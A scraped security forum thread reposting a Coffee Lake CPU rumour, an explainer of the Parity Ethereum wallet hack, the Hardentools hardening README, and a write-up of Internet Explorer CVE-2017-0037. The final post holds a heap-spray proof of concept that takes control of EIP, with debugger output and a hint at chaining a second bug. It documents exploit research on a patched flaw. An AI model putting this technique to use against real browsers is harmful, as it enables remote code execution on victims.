The rumors about Intel's Coffee Lake series processors continue, this time with images as well. Or rather, with one image. A photo of a Coffee Lake processor, taken in CPU-Z, has surfaced on the internet. The authenticity of this image cannot be verified at the moment, so I cannot offer you any guarantee that it is genuine. It does, however, match the rumors so far. This image would be from an i7 processor in the Coffee Lake series, considering that it has Hyperthreading. The processor's name is not given, as it is a test sample. As standard, this variant runs at 3.5GHz, with a current frequency of 3.9GHz, alongside an 80W TDP. Even if the image is authentic, these characteristics are certainly not final, but at least they give us a general idea of the processor's shape and how close it is to launch. For a leak like this to happen, processors are generally only a few months away from launch. The fact that laptops using the Coffee Lake architecture have already started being listed is yet another sign that Intel may be preparing a launch for this autumn. The Coffee Lake series stands out by raising the number of cores available on the mainstream platform to six. It would be the first time Intel has made such a change in the last decade. [Videocardz]

Sursa: https://zonait.tv/un-procesor-intel-coffee-lake-cu-6-nuclee-a-fost-zarit/

It's also known as "@aelius' processor"
-
- 2
-
-
-
[Security Report] A Security Audit of Firefox Accounts
Nytro replied to SirGod's topic in Tutoriale in engleza
Yeah, nice. Over here, not even "union select" is in fashion anymore. -
Now that's more like it...
-
Haseeb Qureshi
Software engineer. @Airbnb alum. Instructor @Outco. Writer. Effective Altruist. Blockchain believer. Former poker pro.
Jul 20

A hacker stole $31M of Ether — how it happened, and what it means for Ethereum

Yesterday, a hacker pulled off the second biggest heist in the history of digital currencies. Around 12:00 PST, an unknown attacker exploited a critical flaw in the Parity multi-signature wallet on the Ethereum network, draining three massive wallets of over $31,000,000 worth of Ether in a matter of minutes.

Given a couple more hours, the hacker could've made off with over $105,000,000 from vulnerable wallets. But someone stopped them.

Having sounded the alarm bells, a group of benevolent white-hat hackers from the Ethereum community rapidly organized. They analyzed the attack and realized that there was no way to reverse the thefts, yet many more wallets were vulnerable. Time was of the essence, so they saw only one available option: hack the remaining wallets before the attacker did.

By exploiting the same vulnerability, the white-hats hacked all of the remaining at-risk wallets and drained their accounts, effectively preventing the attacker from reaching any of the remaining $77,000,000.

Yes, you read that right. To prevent the hacker from robbing any more banks, the white-hats wrote software to rob all of the remaining banks in the world. Once the money was safely stolen, they began the process of returning the funds to their respective account holders. The people who had their money saved by this heroic feat are now in the process of retrieving their funds.

It's an extraordinary story, and it has significant implications for the world of cryptocurrencies. It's important to understand that this exploit was not a vulnerability in Ethereum or in Parity itself. Rather, it was a vulnerability in the default smart contract code that the Parity client gives the user for deploying multi-signature wallets.
This is all pretty complicated, so to make the details of this clear for everyone, this post is broken into three parts:

1. What exactly happened? An explanation of Ethereum, smart contracts, and multi-signature wallets.
2. How did they do it? A technical explanation of the attack (specifically for programmers).
3. What now? The attack's implications about the future and security of smart contracts.

If you are familiar with Ethereum and the crypto world, you can skip to the second section.

1. What exactly happened?

There are three building blocks to this story: Ethereum, smart contracts, and digital wallets.

Ethereum is a digital currency invented in 2013 — a full 4 years after the release of Bitcoin. It has since grown to be the second largest digital currency in the world by market cap — $20 billion, compared to Bitcoin's $40 billion. Like all cryptocurrencies, Ethereum is a descendant of the Bitcoin protocol, and improves on Bitcoin's design. But don't be fooled: though it is a digital currency like Bitcoin, Ethereum is much more powerful.

While Bitcoin uses its blockchain to implement a ledger of monetary transactions, Ethereum uses its blockchain to record state transitions in a gigantic distributed computer. Ethereum's corresponding digital currency, ether, is essentially a side effect of powering this massive computer. To put it another way, Ethereum is literally a computer that spans the entire world. Anyone who runs the Ethereum software on their computer is participating in the operations of this world-computer, the Ethereum Virtual Machine (EVM). Because the EVM was designed to be Turing-complete (ignoring gas limits), it can do almost anything that can be expressed in a computer program.

Let me be emphatic: this is crazy stuff. The crypto world is ebullient about the potential of Ethereum, which has seen its value skyrocket in the last 6 months.
The developer community has rallied behind it, and there's a lot of excitement about what can be built on top of the EVM — and this brings us to smart contracts.

Smart contracts are simply computer programs that run on the EVM. In many ways, they are like normal contracts, except they don't need lawyers or judges to interpret them. Instead, they are compiled to bytecode and interpreted unambiguously by the EVM. With these programs, you can (among other things) programmatically transfer digital currency based solely on the rules of the contract code. Of course, there are things normal contracts do that smart contracts can't — smart contracts can't easily interact with things that aren't on the blockchain. But smart contracts can also do things that normal contracts can't, such as enforce a set of rules entirely through unbreakable cryptography.

This leads us to the notion of wallets. In the world of digital currencies, wallets are how you store your assets. You gain access to your wallet using essentially a secret password, also known as your private key (simplified a bit). There are many different types of wallets that confer different security properties, such as withdrawal limits.

One of the most popular types is the multi-signature wallet. In a multi-signature wallet, there are several private keys that can unlock the wallet, but just one key is not enough to unlock it. If your multi-signature wallet has 3 keys, for example, you can specify that at least 2 of the 3 keys must be provided to successfully unlock it. This means that if you, your father, and your mother are each signatories on this wallet, even if a criminal hacked your mother and stole her private key, they could still not access your funds. This leads to much stronger security guarantees, so multi-sigs are a standard in wallet security.

This is the type of wallet the hacker attacked. So what went wrong? Did they break the private keys?
Did they use a quantum computer, or some kind of cutting-edge factoring algorithm? Nope, all the cryptography was sound. The exploit was almost laughably simple: they found a programmer-introduced bug in the code that let them re-initialize the wallet, almost like restoring it to factory settings. Once they did that, they were free to set themselves as the new owners, and then walk out with everything.

2. How did this happen?

What follows is a technical explanation of exactly what happened. If you're not a developer, feel free to skip to the next section, since this is going to be programming-heavy.

Ethereum has a fairly unique programming model. On Ethereum, you write code by publishing contracts (which you can think of as objects), and transactions are executed by calling methods on these objects to mutate their state. In order to run code on Ethereum, you need to first deploy the contract (the deployment is itself a transaction), which costs a small amount of Ether. You then need to call methods on the contract to interact with it, which costs more Ether. As you can imagine, this incentivizes a programmer to optimize their code, both to minimize transactions and minimize computation costs.

One way to reduce costs is to use libraries. By making your contract call out to a shared library that was deployed at a previous time, you don't have to re-deploy any shared code. In Ethereum, keeping your code DRY will directly save you money. The default multi-sig wallet in Parity did exactly this. It held a reference to a shared external library which contained wallet initialization logic. This shared library is referenced by the public key of the library contract.
// FIELDS
address constant _walletLibrary = 0xa657491c1e7f16adb39b9b60e87bbb8d93988bc3;

The library is called in several places, via an EVM instruction called DELEGATECALL, which does the following: for whatever method that calls DELEGATECALL, it will call the same method on the contract you're delegating to, but using the context of the current contract. It's essentially like a supercall, except without the inheritance part. (The equivalent in JavaScript would be OtherClass.functionName.apply(this, args).)

Here's an example of this in their multi-sig wallet: the isOwner method just delegates to the shared wallet library's isOwner method, using the current contract's state:

function isOwner(address _addr) constant returns (bool) {
  return _walletLibrary.delegatecall(msg.data);
}

This is all innocent enough. The multi-sig wallet itself contained all of the right permission checks, and they were sure to rigorously enforce authorization on all sensitive actions related to the wallet's state. But they made one critical mistake.

Solidity allows you to define a "fallback method." This is the method that gets called when there's no method that matches a given method name. You define it by not giving it a name:

function() {
  // do stuff here for all unknown methods
}

The Parity team decided to let any unknown method that sent Ether to the contract just default to depositing the sent Ether.

function() payable { // payable is just a keyword that means this method can receive/pay Ether
  if (msg.value > 0) {
    // just being sent some cash?
    Deposit(msg.sender, msg.value);
  }
  throw;
}

But they took it a step further, and herein was their critical mistake. Below is the actual code that was attacked.

function() payable {
  // just being sent some cash?
  if (msg.value > 0)
    Deposit(msg.sender, msg.value);
  else if (msg.data.length > 0)
    _walletLibrary.delegatecall(msg.data);
}

Basically:

- If the method name is not defined on this contract…
- And there's no ether being sent in the transaction…
- And there is some data in the message payload…

Then it will call the exact same method if it's defined in _walletLibrary, but in the context of this contract.

Using this, the attacker called a method called initWallet(), which was not defined on the multisig contract but was defined in the shared wallet library:

function initWallet(address[] _owners, uint _required, uint _daylimit) {
  initDaylimit(_daylimit);
  initMultiowned(_owners, _required);
}

Which calls the initMultiowned method...

function initMultiowned(address[] _owners, uint _required) {
  m_numOwners = _owners.length + 1;
  m_owners[1] = uint(msg.sender);
  m_ownerIndex[uint(msg.sender)] = 1;
  for (uint i = 0; i < _owners.length; ++i) {
    m_owners[2 + i] = uint(_owners[i]);
    m_ownerIndex[uint(_owners[i])] = 2 + i;
  }
  m_required = _required;
}

Do you see what just happened there? The attacker essentially reinitialized the contract by delegating through the library method, overwriting the owners on the original contract. They and whatever array of owners they supply as arguments will be the new owners. Given that they now control the entire wallet, they can trivially extract the remainder of the balance. And that's precisely what they did.

The initWallet: https://etherscan.io/tx/0x707aabc2f24d756480330b75fb4890ef6b8a26ce0554ec80e3d8ab105e63db07
The transfer: https://etherscan.io/tx/0x9654a93939e98ce84f09038b9855b099da38863b3c2e0e04fd59a540de1cb1e5

So what was ultimately the vulnerability? You could argue there were two. First, the initWallet and initMultiowned methods in the wallet library were not marked as internal (this is like a private method, which would prevent this delegated call), and those methods did not check that the wallet wasn't already initialized.
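To make the storage-context confusion concrete, here is a simplified Python model of the bug (this is not EVM code: contract storage is modeled as a plain dict, and the delegatecall is modeled as running the library function against the caller's storage):

```python
class WalletLibrary:
    # Library code: it writes to *whatever storage it is run against*.
    def init_wallet(self, storage, owners):
        storage["owners"] = list(owners)   # note: no "already initialized?" check

class Wallet:
    def __init__(self, library, owners):
        self.storage = {"owners": list(owners)}
        self.library = library

    def fallback(self, method, args):
        # Model of the vulnerable fallback: any unknown method name is
        # delegate-called into the library, using THIS wallet's storage.
        fn = getattr(self.library, method)
        fn(self.storage, *args)

lib = WalletLibrary()
wallet = Wallet(lib, owners=["alice", "bob", "carol"])

# The attacker calls a method the wallet itself never defined:
wallet.fallback("init_wallet", (["attacker"],))
print(wallet.storage["owners"])  # -> ['attacker']
```

The library code is shared, but the storage it mutates belongs to the calling wallet, which is exactly why an unguarded init routine reachable through the fallback is fatal.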
Either check would've made this hack impossible. The second vulnerability was the raw delegateCall. You can think of this as equivalent to a raw eval statement, running on a user-supplied string. In an attempt to be succinct, this contract used metaprogramming to proxy potential method calls to an underlying library. The safer approach here would be to whitelist specific methods that the user is allowed to call. The trouble, of course, is that this is more expensive in gas costs (since it has to evaluate more conditionals). But when it comes to security, we probably have to get over this concern when writing smart contracts that move massive amounts of money.

So that was the attack. It was a clever catch, but once you point it out, it seems almost elementary. The attacker then jumped on this vulnerability for three of the largest wallets they could find — but judging from the transaction times, they were doing this entirely manually. The white-hat group was doing this at scale using scripts, and that's why they were able to beat the attacker to the punch. Given this, it's unlikely that the attacker was very sophisticated in how they planned their attack.

You might ask the question though — why don't they just roll back this hack, like they did with the DAO hack? Unfortunately that's not really possible. The DAO hack was unique in that when the attacker drained the DAO into a child DAO, the funds were frozen for many days inside a smart contract before they could be released to the attacker. This prevented any of the stolen funds from going into circulation, so the stolen Ether was effectively siloed. This gave the Ethereum community plenty of time to conduct a public quorum about how to deal with the attack.

In this attack, the attacker immediately stole the funds and could start spending them. A hard fork would be impractical — what do you do about all of the transactions that occur downstream? What about the people who innocently traded assets with the attacker?
Once the ether they’ve stolen gets laundered and enters general circulation, it’s like counterfeit bills circulating in the economy — it’s easy to stop when it’s all in one briefcase, but once everyone’s potentially holding a counterfeit bill, you can’t really turn back the clock anymore. So the transaction won’t get reversed. The $31M loss stands. It’s a costly, but necessary lesson. So what should we take away from this? 3. What does this attack mean for Ethereum? There are several important takeaways here. First, remember, this was not a flaw in Ethereum or in smart contracts in general. Rather, it was a developer error in a particular contract. So who were the crackpot developers who wrote this? They should’ve known better, right? The developer here was Gavin Wood, one of the co-creators of Ethereum, and the inventor of Solidity, the smart contract programming language. The code was also reviewed by other Parity contributors. This is basically the highest standard of programming that exists in the Ethereum ecosystem. Gavin is human. He made a mistake. And so did the reviewers who audited his code. I’ve read some comments on Reddit and HackerNews along the lines of: “What an obvious mistake! How was it even possible they missed this?” (Ignoring that the “obvious” vulnerability was introduced in January and only now discovered.) When I see responses like this, I know the people commenting are not professional developers. For a serious developer, the reaction is instead: damn, that was a dumb mistake. I’m glad I wasn’t the one who made it. Mistakes of this sort are routinely made in programming. All programs carry the risk of developer error. We have to throw off the mindset of “if they were just more careful, this wouldn’t have happened.” At a certain scale, carefulness is not enough. As programs scale to non-trivial complexity, you have to start taking it as a given that programs are probably not correct. 
No amount of human diligence or testing is sufficient to prevent all possible bugs. Even organizations like Google or NASA make programming mistakes, despite the extreme rigor they apply to their most critical code.

We would do well to take a page from site reliability practices at companies like Google and Airbnb. Whenever there's a production bug or outage, they do a postmortem analysis and distribute it within the company. In these postmortems, there is always a principle of never blaming individuals. Blaming mistakes on individuals is pointless, because all programmers, no matter how experienced, have a nonzero likelihood of making a mistake. Instead, the purpose of a postmortem is to identify what in the process allowed that mistake to get deployed.

The problem was not that Gavin Wood forgot to add internal to the wallet library, or that he did a raw delegateCall without checking what method was being called. The problem is that his programming toolchain allowed him to make these mistakes. As the smart contract ecosystem evolves, it has to evolve in the direction of making these mistakes harder, and that means making contracts secure by default. This leads me to my next point.

Strength is a weakness when it comes to programming languages. The stronger and more expressive a programming language is, the more complex its code becomes. Solidity is a very complex language, modeled to resemble Java. Complexity is the enemy of security. Complex programs are more difficult to reason about and harder to identify edge cases for.

I think that languages like Viper (maintained by Vitalik Buterin) are a promising step in this direction. Viper includes by default basic security mechanisms, such as bounded looping constructs and no integer overflows, and prevents other basic bugs that developers shouldn't have to reason about. The less the language lets you do, the easier it is to analyze and prove properties of a contract.
Security is hard because the only way to prove a positive statement like "this contract is secure" is to disprove every possible attack vector: "this contract cannot be re-initialized," "its funds cannot be accessed except by the owners," etc. The fewer possible attack vectors you have to consider, the easier it is to develop a secure contract.

A simpler programming model also allows things like formal verification and automatic test generation. These are areas under active research, but just as smart contracts have incorporated cutting-edge cryptography, they also should start incorporating the leading edge of programming language design.

There is a bigger lesson here too. Most of the programmers who are getting into this space, myself included, come from a web development background, and the blockchain toolchain is designed to be familiar for web developers. Solidity has achieved tremendous adoption in the developer community because of its familiarity to other forms of programming. In a way, this may end up being its downfall. The problem is, blockchain programming is fundamentally different from web development. Let me explain.

Before the age of the client-server web model, most programming was done for packaged consumer software or on embedded systems. This was before the day of automatic software updates. In these programs, a shipped product was final — you released one form of your software every 6 months, and if there was a bug, that bug would have to stand until the next release. Because of this longer development cycle, all software releases were rigorously tested under all conceivable circumstances.

Web development is far more forgiving. When you push bad code to a web server, it's not a big deal if there's a critical mistake — you can just roll back the code, or roll forward with a fix, and all is well because you control the server.
Or if the worst happens and there's an active breach or a data leak, you can always stop the bleeding by shutting off your servers and disconnecting yourself from the network.

These two development models are fundamentally different. It's only out of something like web development that you can get the motto "move fast and break things." Most programmers today are trained on the web development model. Unfortunately, the blockchain security model is more akin to the older model.

In blockchain, code is intrinsically unrevertible. Once you deploy a bad smart contract, anyone is free to attack it as long and hard as they can, and there's no way to take it back if they get to it first. Unless you build intelligent security mechanisms into your contracts, if there's a bug or successful attack, there's no way to shut off your servers and fix the mistake. Being on Ethereum by definition means everyone owns your server.

A common saying in cybersecurity is "attack is always easier than defense." Blockchain sharply multiplies this imbalance. It's far easier to attack because you have access to the code of every contract, know how much money is in it, and can take as long as you want to try to attack it. And once your attack is successful, you can potentially steal all of the money in the contract.

Imagine that you were deploying software for vending machines. But instead of a bug allowing you to simply steal candy from one machine, the bug allowed you to simultaneously steal candy from every machine in the world that employed this software. Yeah, that's how blockchain works.

In the case of a successful attack, defense is extremely difficult. The white-hats in the Parity hack demonstrated how limited their defense options were — there was no way to secure or dismantle the contracts, or even to hack back the stolen money; all they could do was hack the remaining vulnerable contracts before the attacker did. This might seem to spell a dark future.
But I don’t think this is a death knell for blockchain programming. Rather, it confirms what everyone already knows: this ecosystem is young and immature. It’s going to take a lot of work to develop the training and discipline to treat smart contracts the way that banks treat their ATM software. But we’re going to have to get there for blockchain to be successful in the long run. This means not just programmers maturing and getting more training. It also means developing tools and languages that make all of this easier, and give us rigorous guarantees about our code. It’s still early. Ethereum is a work in progress, and it’s changing rapidly. You should not treat Ethereum as a bank or as a replacement for financial infrastructure. And certainly you should not store any money in a hot walletthat you’re not comfortable losing. But despite all that, I still think Ethereum is going to win in the long run. And here’s why: the developer community in Ethereum is what makes it so powerful. Ethereum will not live or die because of the money in it. It will live or die based on the developers who are fighting for it. The league of white-hats who came together and defended the vulnerable wallets didn’t do it for money. They did it because they believe in this ecosystem. They want Ethereum to thrive. They want to see their vision of the future come true. And after all the speculation and the profiteering, it’s ultimately these people who are going to usher the community into its future. They are fundamentally why Ethereum will win in the long run—or if they abandon Ethereum, their abandonment will be why it loses. This attack is important. It will shake people up. It will force the community to take a long, hard look at security best practices. It will force developers to treat smart contract programming with far more rigor than they currently do. But this attack hasn’t shaken the strength of the builders who are working on this stuff. So in that sense it’s a temporary setback. 
This attack is important. It will shake people up. It will force the community to take a long, hard look at security best practices. It will force developers to treat smart contract programming with far more rigor than they currently do. But this attack hasn't shaken the strength of the builders who are working on this stuff. So in that sense it's a temporary setback.

In the end, attacks like this are good for the community to grow up. They call you to your senses and force you to keep your eyes open. It hurts, and the press will likely make a mess of the story. But every wound makes the community stronger, and gets us closer to really deeply understanding the technology of blockchain — both its dangers, and its amazing potential.

P.S. If you're a dev and you want to learn more about smart contract security, this is a really good resource.

Sursa: https://medium.freecodecamp.org/a-hacker-stole-31m-of-ether-how-it-happened-and-what-it-means-for-ethereum-9e5dc29e33ce
-
- 1
-
-
Hardentools

Hardentools is a collection of simple utilities designed to disable a number of "features" exposed by operating systems (Microsoft Windows, for now) and primary consumer applications. These features, commonly intended for Enterprise customers, are generally useless to regular users and rather pose as dangers, as they are very commonly abused by attackers to execute malicious code on a victim's computer. The intent of this tool is to simply reduce the attack surface by disabling the low-hanging fruit. Hardentools is intended for individuals at risk, who might want an extra level of security at the price of some usability. It is not intended for corporate environments.

WARNING: This is just an experiment, it is not meant for public distribution yet. Also, this tool disables a number of features, including of Microsoft Office, Adobe Reader, and Windows, that might cause malfunctions to certain applications. Use this at your own risk.

Bear in mind, after running Hardentools you won't be able, for example, to do complex calculations with Microsoft Office Excel or use the command-line terminal, but those are pretty much the only considerable "downsides" of having a slightly safer Windows environment. Before deciding to use it, make sure you read this document thoroughly and understand that yes, something might break. In case you experience malfunctions as a result of the modifications implemented by this tool, please do let us know. When you're ready, you can find the latest download here.

How to use it

Once you double-click on the icon, depending on your Windows security settings, you should be prompted with a User Account Control dialog asking you for confirmation to allow Hardentools to run. Click "Yes". Then, you will see the main Hardentools window. It's very simple: you just click on the "Harden" button, and the tool will make the changes to your Windows configuration to disable a set of features that are risky.
Once completed, you will be asked to restart your computer for all the changes to have full effect.

In case you wish to restore the original settings and revert the changes Hardentools made (for example, if you need to use cmd.exe), you can simply re-run the tool, and instead of a "Harden" button you will be prompted with a "Restore" button. Similarly, click it and wait for the modifications to be reverted. In the future, we will create the ability to select or deselect certain modifications Hardentools is configured to make.

Please note: the modifications made by Hardentools are exclusively contextual to the Windows user account used to run the tool from. In case you want Hardentools to change settings for other Windows users as well, you will have to run it from each one of them logged in.

What this tool does NOT

- It does NOT prevent software from being exploited.
- It does NOT prevent the abuse of every available risky feature.
- It is NOT an Antivirus. It does not protect your computer. It doesn't identify, block, or remove any malware.
- It does NOT prevent the changes it implements from being reverted. If malicious code runs on the system and it is able to restore them, the premise of the tool is defeated, isn't it?

Disabled Features

Generic Windows Features

- Disable Windows Script Host. Windows Script Host allows the execution of VBScript and Javascript files on Windows operating systems. This is very commonly used by regular malware (such as ransomware) as well as targeted malware.
- Disabling AutoRun and AutoPlay. Disables AutoRun / AutoPlay for all devices. For example, this should prevent applications from automatically executing when you plug a USB stick into your computer.
- Disables powershell.exe, powershell_ise.exe and cmd.exe execution via Windows Explorer. You will not be able to use the terminal, and it should prevent the use of PowerShell by malicious code trying to infect the system.
Sets User Account Control (UAC) to always ask for permission (even on configuration changes only) and to use "secure desktop".
Disable file extensions mainly used for malicious purposes. Disables the ".hta", ".js", ".JSE", ".WSH", ".WSF", ".scr", ".vbs" and ".pif" file extensions for the current user (and for system-wide defaults, which is only relevant for newly created users).
Microsoft Office
Disable Macros. Macros are at times used by Microsoft Office users to script and automate certain activities, especially calculations with Microsoft Excel. However, macros are currently a security plague, and they are widely used as a vehicle for compromise. With Hardentools, macros are disabled and the "Enable this Content" notification is disabled too, to prevent users from being tricked.
Disable OLE object execution. Microsoft Office applications are able to embed so-called "OLE objects" and execute them, at times also automatically (for example through PowerPoint animations). Windows executables, such as spyware, can also be embedded and executed as an object. This is also a security disaster that we have observed used time and time again, particularly in attacks against activists in repressed regions. Hardentools entirely disables this functionality.
Disabling ActiveX. Disables ActiveX Controls for all Office applications.
Acrobat Reader
Disable JavaScript in PDF documents. Acrobat Reader allows executing JavaScript code from within PDF documents. This is widely abused for exploitation and malicious activity.
Disable execution of objects embedded in PDF documents. Acrobat Reader also allows executing embedded objects by opening them. This would normally raise a security alert, but given that legitimate uses of this are rare and limited, Hardentools disables this.
Authors
This tool is developed by Claudio Guarnieri, Mariano Graziano and Florian Probst.
Sursa: https://github.com/securitywithoutborders/hardentools
-
CVE to PoC - CVE-2017-0037 17 JULY 2017 CVE-2017-0037 Internet Explorer “Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.” The PoC The vulnerability was found by Ivan Fratric of Google Project Zero. The following is the PoC he provided: <!-- saved from url=(0014)about:internet --> <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,100)"> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="5" width=0></th> <th class="class2" width=0><div class="class2"></div></th> With a few notes: The PoC crashes in MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement when reading from address 0000007800000070 [...] Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address. [...] Let's take a look at the code around the rip of the crash. 00007ffe`8f330a51 488bcd mov rcx,rbp 00007ffe`8f330a54 e8873c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=???????????????? 
00007ffe`8f330a5d 743d je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c) 00007ffe`8f330a5f 488bcd mov rcx,rbp 00007ffe`8f330a62 e8793c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a67 488b30 mov rsi,qword ptr [rax] 00007ffe`8f330a6a 488b06 mov rax,qword ptr [rsi] 00007ffe`8f330a6d 488bb848030000 mov rdi,qword ptr [rax+348h] 00007ffe`8f330a74 488bcf mov rcx,rdi 00007ffe`8f330a77 ff155b95d700 call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)] 00007ffe`8f330a7d 488bce mov rcx,rsi 00007ffe`8f330a80 ffd7 call rdi On 00007ffe`8f330a51 rcx is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations). On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory. However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the first th element. Let's see what happens if an attacker can point rax to the memory he/she controls. Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80. 
Sounds pretty easy to control that CMP condition if we can perform heap spray and point EAX to some memory location we control. Control EIP First of all let's confirm that the PoC works: (654.eec): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000038 ebx=049f4758 ecx=049f4758 edx=00000002 esi=00000064 edi=5a0097f0 eip=59a15caf esp=0399bd68 ebp=0399bd94 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:00000038=???????? I played a little bit with the width of that "th" element as suggested by Ivan and found that a value of "2000000" allows us to move the value of EAX to a controlled memory location in the heap spray: 0:018> bu 59a15caf 0:018> g [...] Breakpoint 0 hit eax=03bd86d4 ebx=03bd86c4 ecx=03bd86c4 edx=00000002 esi=00000064 edi=5a005320 eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:03bd86d4=a0949807 (skip the first break) 0:007> g Breakpoint 0 hit eax=0bebc2d8 ebx=04be9ae0 ecx=04be9ae0 edx=00000002 esi=00000064 edi=5a0097f0 eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:0bebc2d8=0e0e0e0e As expected, EAX points to some valid (and controllable) memory location. 
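Why a spray value such as 0x0e0e0e0e is convenient can be sketched with a toy memory model (illustrative Python, not the real exploit; the address range and the self-referential pattern are assumptions for the sketch): memory filled with the pattern is "self-referential", so any pointer-sized read inside the sprayed region yields an address that still lands inside attacker-controlled data, and chained dereferences never escape the spray.

```python
# Toy model (assumed): a DEPS-style heap spray fills a large region with
# the value 0x0e0e0e0e. Every 32-bit read inside that region returns
# 0x0e0e0e0e, which is itself an address inside the region.

SPRAY_BASE, SPRAY_END = 0x0A000000, 0x20000000  # assumed spray range

def deref(addr):
    """Model a 32-bit read from sprayed memory."""
    if not (SPRAY_BASE <= addr < SPRAY_END):
        raise MemoryError("read left the controlled region")
    return 0x0E0E0E0E

ebx = deref(0x0BEBC2D8)   # like: mov ebx, [eax]
eax = deref(ebx)          # like: mov eax, [ebx]
edi = deref(eax + 0x1A4)  # like: mov edi, [eax+1A4h]
print(hex(edi))           # → 0xe0e0e0e (still attacker-controlled)
```

Each dereference stays inside the spray, which is why controlling the initial pointer is enough to eventually control a function pointer.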
If the CMP condition is satisfied the vulnerable routine tries to load the vftable of the object located at "0e0e0e0e" and calls the function at +1A4h: 59a15caf 833800 cmp dword ptr [eax],0 59a15cb2 7448 je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xf1 (59a15cfc) 59a15cb4 8bcb mov ecx,ebx 59a15cb6 e8ec8181ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::SGridBoxItem> >::Readable (5922dea7) 59a15cbb 8965f0 mov dword ptr [ebp-10h],esp 59a15cbe 8b18 mov ebx,dword ptr [eax] 59a15cc0 8b03 mov eax,dword ptr [ebx] 59a15cc2 8bb8a4010000 mov edi,dword ptr [eax+1A4h] 59a15cc8 8bcf mov ecx,edi 59a15cca ff15ac1f455a call dword ptr [MSHTML!__guard_check_icall_fptr (5a451fac)] 59a15cd0 8bcb mov ecx,ebx 59a15cd2 ffd7 call edi Step by step: 59a15cbe 8b18 mov ebx,dword ptr [eax] ds:002b:0bebc2d8=0e0e0e0e 59a15cc0 8b03 mov eax,dword ptr [ebx] ds:002b:0e0e0e0e=0e0e0e0e 59a15cc2 8bb8a4010000 mov edi,dword ptr [eax+1A4h] ds:002b:0e0e0fb2=41414141 59a15cd2 ffd7 call edi {41414141} The following is a working PoC to set EIP to 41414141 <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,1000)"> <div id="hs"></div> <script> // Heap Spray - DEPS avoid null bytes var hso = document.getElementById("hs"); hso.style.cssText = "display:none"; var junk = unescape("%u0e0e%u0e0e"); while (junk.length < 0x1000) junk += junk; var rop = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc"); var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc"); var xchg = unescape("%u4141%u4141"); // initial EIP control var offset = 0x7c9; // to control eip var data = junk.substring(0,offset) + xchg + rop + shellcode; data += 
junk.substring(0,0x800-offset-xchg.length-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x350; i++) { var obj = document.createElement("button"); obj.title = data.substring(0,(0x7fb00-2)/2); // 2 null bytes terminator hso.appendChild(obj); } </script> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="0" width=2000000></th> <!-- width should control eax contents, should land somewhere in the heap spray --> <th class="class2" width=0><div class="class2"></div></th> Working Exploit It's pretty obvious: we have a memory leak and control of EIP. Chain together CVE-2017-0059 and CVE-2017-0037 and you'll have a working exploit for Windows 7 and IE11... or just wait until tomorrow for the full release Claudio Moletta Sursa: https://redr2e.com/cve-to-poc-cve-2017-0037/
-
